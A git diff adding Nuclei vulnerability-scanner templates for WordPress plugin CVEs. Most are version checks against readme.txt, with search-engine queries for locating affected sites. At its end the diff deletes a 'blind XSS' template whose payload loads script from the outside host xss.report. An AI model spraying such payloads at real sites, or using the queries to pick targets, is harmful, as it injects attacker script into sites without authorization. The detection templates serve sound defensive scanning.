Authenticated (Contributor+) Stored Cross-Site Scripting via Post Grid Widget + author: topscoder + severity: low + description: > + The 140+ Widgets | Xpro Addons For Elementor – FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘arrow’ parameter within the Post Grid widget in all versions up to, and including, 1.4.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6025dd5-a1d7-48cc-90b3-f020d3d2298b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-7791 + metadata: + fofa-query: "wp-content/plugins/xpro-elementor-addons/" + google-query: inurl:"/wp-content/plugins/xpro-elementor-addons/" + shodan-query: 'vuln:CVE-2024-7791' + tags: cve,wordpress,wp-plugin,xpro-elementor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/xpro-elementor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "xpro-elementor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7816.yaml b/nuclei-templates/CVE-2024/CVE-2024-7816.yaml new file mode 100644 index 0000000000..82cbd5f92e --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7816.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7816 + +info: + name: > + Gixaw Chat <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Gixaw Chat plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ecaa02bf-62be-4f1d-af31-96afc72a830d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7816 + metadata: + fofa-query: "wp-content/plugins/gixaw-chat/" + google-query: inurl:"/wp-content/plugins/gixaw-chat/" + shodan-query: 'vuln:CVE-2024-7816' + tags: cve,wordpress,wp-plugin,gixaw-chat,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gixaw-chat/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gixaw-chat" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7817.yaml b/nuclei-templates/CVE-2024/CVE-2024-7817.yaml new file mode 100644 index 0000000000..dbf260b31a --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7817.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7817 + +info: + name: > + Misiek Photo Album <= 1.4.3 - Cross-Site Request Forgery to Album Deletion + author: topscoder + severity: medium + description: > + The Misiek Photo Album plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to delete albums via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9e6eec31-0603-40ab-9ed1-eedb163de1d6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7817 + metadata: + fofa-query: "wp-content/plugins/misiek-photo-album/" + google-query: inurl:"/wp-content/plugins/misiek-photo-album/" + shodan-query: 'vuln:CVE-2024-7817' + tags: cve,wordpress,wp-plugin,misiek-photo-album,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/misiek-photo-album/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "misiek-photo-album" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7818.yaml b/nuclei-templates/CVE-2024/CVE-2024-7818.yaml new file mode 100644 index 0000000000..2237e83b48 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7818.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7818 + +info: + name: > + Misiek Photo Album <= 1.4.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Misiek Photo Album plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a25a00b5-baf3-4175-b242-857c1f79b9a2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-7818 + metadata: + fofa-query: "wp-content/plugins/misiek-photo-album/" + google-query: inurl:"/wp-content/plugins/misiek-photo-album/" + shodan-query: 'vuln:CVE-2024-7818' + tags: cve,wordpress,wp-plugin,misiek-photo-album,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/misiek-photo-album/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "misiek-photo-album" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7820.yaml b/nuclei-templates/CVE-2024/CVE-2024-7820.yaml new file mode 100644 index 0000000000..761d29bd41 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7820.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7820 + +info: + name: > + ILC Thickbox <= 1.0 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The ILC Thickbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e700a02f-21a7-4786-b7a7-d0c83a9314e3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7820 + metadata: + fofa-query: "wp-content/plugins/ilc-thickbox/" + google-query: inurl:"/wp-content/plugins/ilc-thickbox/" + shodan-query: 'vuln:CVE-2024-7820' + tags: cve,wordpress,wp-plugin,ilc-thickbox,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ilc-thickbox/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ilc-thickbox" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7822.yaml b/nuclei-templates/CVE-2024/CVE-2024-7822.yaml new file mode 100644 index 0000000000..7907ac1772 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7822.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7822 + +info: + name: > + Quick Code <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Quick Code plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c287ed1d-83ff-4ee7-bebc-e57850d081a0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7822 + metadata: + fofa-query: "wp-content/plugins/quick-code/" + google-query: inurl:"/wp-content/plugins/quick-code/" + shodan-query: 'vuln:CVE-2024-7822' + tags: cve,wordpress,wp-plugin,quick-code,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/quick-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "quick-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7860.yaml b/nuclei-templates/CVE-2024/CVE-2024-7860.yaml new file mode 100644 index 0000000000..a890260d92 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7860.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7860 + +info: + name: > + Simple Headline Rotator <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Simple Headline Rotator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/beaea592-5eb5-4400-a4a8-b73f9b94198b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7860 + metadata: + fofa-query: "wp-content/plugins/simple-headline-rotator/" + google-query: inurl:"/wp-content/plugins/simple-headline-rotator/" + shodan-query: 'vuln:CVE-2024-7860' + tags: cve,wordpress,wp-plugin,simple-headline-rotator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-headline-rotator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-headline-rotator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7861.yaml b/nuclei-templates/CVE-2024/CVE-2024-7861.yaml new file mode 100644 index 0000000000..6955b61b4b --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7861.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7861 + +info: + name: > + Misiek Paypal <= 1.1.20090324 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Misiek Paypal plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.20090324. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cefdf1c5-eab4-4f06-aa5c-24cdef36e5f9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7861 + metadata: + fofa-query: "wp-content/plugins/misiek-paypal/" + google-query: inurl:"/wp-content/plugins/misiek-paypal/" + shodan-query: 'vuln:CVE-2024-7861' + tags: cve,wordpress,wp-plugin,misiek-paypal,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/misiek-paypal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "misiek-paypal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.20090324') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7862.yaml b/nuclei-templates/CVE-2024/CVE-2024-7862.yaml new file mode 100644 index 0000000000..9e55ee0e0f --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7862.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7862 + +info: + name: > + Blog Introduction <= 0.3.0 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The Blog Introduction plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2896c925-e035-4193-92db-e8a3dd34a0b7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7862 + metadata: + fofa-query: "wp-content/plugins/blogintroduction-wordpress-plugin/" + google-query: inurl:"/wp-content/plugins/blogintroduction-wordpress-plugin/" + shodan-query: 'vuln:CVE-2024-7862' + tags: cve,wordpress,wp-plugin,blogintroduction-wordpress-plugin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blogintroduction-wordpress-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blogintroduction-wordpress-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.3.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7918.yaml b/nuclei-templates/CVE-2024/CVE-2024-7918.yaml new file mode 100644 index 0000000000..ced2912679 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7918.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7918 + +info: + name: > + Pocket Widget <= 0.1.3 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Pocket Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 0.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c525344a-fb62-48c9-bfd2-a77f59da3470?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7918 + metadata: + fofa-query: "wp-content/plugins/pocket-widget/" + google-query: inurl:"/wp-content/plugins/pocket-widget/" + shodan-query: 'vuln:CVE-2024-7918' + tags: cve,wordpress,wp-plugin,pocket-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pocket-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pocket-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.1.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-8046.yaml b/nuclei-templates/CVE-2024/CVE-2024-8046.yaml new file mode 100644 index 0000000000..d195a54679 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8046.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8046 + +info: + name: > + Logo Showcase Ultimate – Logo Carousel, Logo Slider & Logo Grid <= 1.4.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Logo Showcase Ultimate – Logo Carousel, Logo Slider & Logo Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/89525af0-105a-4d7d-93d1-af724a837e7a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8046 + metadata: + fofa-query: "wp-content/plugins/logo-showcase-ultimate/" + google-query: inurl:"/wp-content/plugins/logo-showcase-ultimate/" + shodan-query: 'vuln:CVE-2024-8046' + tags: cve,wordpress,wp-plugin,logo-showcase-ultimate,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/logo-showcase-ultimate/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "logo-showcase-ultimate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-8054.yaml b/nuclei-templates/CVE-2024/CVE-2024-8054.yaml new file mode 100644 index 0000000000..86a83294b9 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8054.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8054 + +info: + name: > + MM-Breaking News <= 0.7.9 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The MM-Breaking News plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.7.9. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/882639e3-615f-48df-9ddc-afbe0788d55f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8054 + metadata: + fofa-query: "wp-content/plugins/mm-breaking-news/" + google-query: inurl:"/wp-content/plugins/mm-breaking-news/" + shodan-query: 'vuln:CVE-2024-8054' + tags: cve,wordpress,wp-plugin,mm-breaking-news,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mm-breaking-news/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mm-breaking-news" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.7.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-8056.yaml b/nuclei-templates/CVE-2024/CVE-2024-8056.yaml new file mode 100644 index 0000000000..fe53462201 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8056.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8056 + +info: + name: > + MM-Breaking News <= 0.7.9 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The MM-Breaking News plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 0.7.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b809ca97-ea82-4d56-a90a-e1ea9e7235ff?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8056 + metadata: + fofa-query: "wp-content/plugins/mm-breaking-news/" + google-query: inurl:"/wp-content/plugins/mm-breaking-news/" + shodan-query: 'vuln:CVE-2024-8056' + tags: cve,wordpress,wp-plugin,mm-breaking-news,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mm-breaking-news/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mm-breaking-news" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.7.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-8197.yaml b/nuclei-templates/CVE-2024/CVE-2024-8197.yaml new file mode 100644 index 0000000000..7e48fc65a0 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8197.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8197 + +info: + name: > + Visual Sound <= 1.03 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The Visual Sound plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.03. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/48d6d4c1-cc87-4c2c-9fbb-90af62f576aa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8197 + metadata: + fofa-query: "wp-content/plugins/visual-sound/" + google-query: inurl:"/wp-content/plugins/visual-sound/" + shodan-query: 'vuln:CVE-2024-8197' + tags: cve,wordpress,wp-plugin,visual-sound,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/visual-sound/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-sound" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.03') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-8199.yaml b/nuclei-templates/CVE-2024/CVE-2024-8199.yaml new file mode 100644 index 0000000000..fc1a442f84 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8199.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8199 + +info: + name: > + Reviews Feed – Add Testimonials and Customer Reviews From Google Reviews, Yelp, TripAdvisor, and More <= 1.1.2 - Missing Authorization to Authenticated (Subscriber+) Limited Settings Update + author: topscoder + severity: low + description: > + The Reviews Feed – Add Testimonials and Customer Reviews From Google Reviews, Yelp, TripAdvisor, and More plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_api_key' function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update API Key options. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc3e89e5-2e7e-497e-b340-b787ebdf3711?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8199 + metadata: + fofa-query: "wp-content/plugins/reviews-feed/" + google-query: inurl:"/wp-content/plugins/reviews-feed/" + shodan-query: 'vuln:CVE-2024-8199' + tags: cve,wordpress,wp-plugin,reviews-feed,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/reviews-feed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "reviews-feed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-8200.yaml b/nuclei-templates/CVE-2024/CVE-2024-8200.yaml new file mode 100644 index 0000000000..900fd5baee --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8200.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8200 + +info: + name: > + Reviews Feed – Add Testimonials and Customer Reviews From Google Reviews, Yelp, TripAdvisor, and More <= 1.1.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Reviews Feed – Add Testimonials and Customer Reviews From Google Reviews, Yelp, TripAdvisor, and More plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the 'update_api_key' function. This makes it possible for unauthenticated attackers to update an API key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d9e20f7-813c-4691-bce4-d0ff4774ae48?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8200 + metadata: + fofa-query: "wp-content/plugins/reviews-feed/" + google-query: inurl:"/wp-content/plugins/reviews-feed/" + shodan-query: 'vuln:CVE-2024-8200' + tags: cve,wordpress,wp-plugin,reviews-feed,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/reviews-feed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "reviews-feed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/nuclei-templates/Other/0x71rex-blind-xss.yaml b/nuclei-templates/Other/0x71rex-blind-xss.yaml deleted file mode 100644 index 3f6bcba7bb..0000000000 --- a/nuclei-templates/Other/0x71rex-blind-xss.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: blind-xss - -info: - name: Blind XSS - author: shelled - severity: medium - description: This template will spray blind XSS payloads into URLs. Use xss.report to check if the payload fired. - tags: xss,blind,generic - -requests: - - raw: - - | - GET {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: {{injection}} - - - payloads: - injection: - - '"><script src=//xss.report/s/shelled></script>' - - '"><img src=x 